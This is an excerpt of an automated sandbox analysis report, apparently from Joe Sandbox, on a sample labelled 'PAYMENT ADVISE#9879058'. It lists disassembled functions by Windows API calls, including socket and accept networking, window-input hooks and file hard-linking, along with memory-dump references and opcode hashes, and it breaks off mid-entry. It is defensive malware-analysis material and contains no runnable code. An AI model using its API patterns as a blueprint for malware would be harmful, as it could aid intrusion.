                          Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                          • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                          • #21.WSOCK32 ref: 004740E0
                          • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ErrorLast$socket
                          • String ID:
                          • API String ID: 1881357543-0
                          • Opcode ID: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                          • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                          • Opcode Fuzzy Hash: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                          • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                          Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                          Download Yara Rule
                          APIs
                          • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                          • GetWindowRect.USER32(?,?), ref: 00441D5A
                          • PtInRect.USER32(?,?,?), ref: 00441D6F
                          • MessageBeep.USER32(00000000), ref: 00441DF2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                          • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                          • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                          • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                          Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                          • __isleadbyte_l.LIBCMT ref: 004238B2
                          • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                          • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                          • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                          • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                          • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                          Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                          • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                          • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                          • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                          • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                          • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                          Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 004505BF
                          • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                          • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                          • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Proc$Parent
                          • String ID:
                          • API String ID: 2351499541-0
                          • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                          • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                          • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                          • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                          Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                          • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                          • __itow.LIBCMT ref: 00461461
                          • __itow.LIBCMT ref: 004614AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$__itow$_wcslen
                          • String ID:
                          • API String ID: 2875217250-0
                          • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                          • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                          • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                          • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                          Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0040E202
                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: IconNotifyShell__memset
                          • String ID:
                          • API String ID: 928536360-0
                          • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                          • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                          • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                          • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                          Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32 ref: 00472806
                            • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                            • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                            • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                          • GetCaretPos.USER32(?), ref: 0047281A
                          • ClientToScreen.USER32(00000000,?), ref: 00472856
                          • GetForegroundWindow.USER32 ref: 0047285C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                          • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                          • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                          • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                          Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                          • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                          • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                          • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                          • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                          Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32 ref: 00448CB8
                          • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow
                          • String ID:
                          • API String ID: 312131281-0
                          • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                          • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                          • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                          • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                          Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                          Download Yara Rule
                          APIs
                          • select.WSOCK32 ref: 0045890A
                          • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                          • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                          • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ErrorLastacceptselect
                          • String ID:
                          • API String ID: 385091864-0
                          • Opcode ID: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                          • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                          • Opcode Fuzzy Hash: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                          • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                          Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                          • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                          • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                          • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                          Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                          Download Yara Rule
                          APIs
                          • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                          • GetStockObject.GDI32(00000011), ref: 00433695
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                          • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$CreateMessageObjectSendShowStock
                          • String ID:
                          • API String ID: 1358664141-0
                          • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                          • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                          • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                          • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                          Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 004441B8
                          • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                          • CloseHandle.KERNEL32(00000000), ref: 00444213
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                          • String ID:
                          • API String ID: 2880819207-0
                          • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                          • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                          • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                          • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                          Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00434037
                          • ScreenToClient.USER32(?,?), ref: 0043405B
                          • ScreenToClient.USER32(?,?), ref: 00434085
                          • InvalidateRect.USER32(?,?,?), ref: 004340A4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ClientRectScreen$InvalidateWindow
                          • String ID:
                          • API String ID: 357397906-0
                          • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                          • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                          • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                          • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                          Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          • __wsplitpath.LIBCMT ref: 00436A45
                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                          • __wsplitpath.LIBCMT ref: 00436A6C
                          • __wcsicoll.LIBCMT ref: 00436A93
                          • __wcsicoll.LIBCMT ref: 00436AB0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                          • String ID:
                          • API String ID: 1187119602-0
                          • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                          • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                          • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                          • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                          Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                          • String ID:
                          • API String ID: 1597257046-0
                          • Opcode ID: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
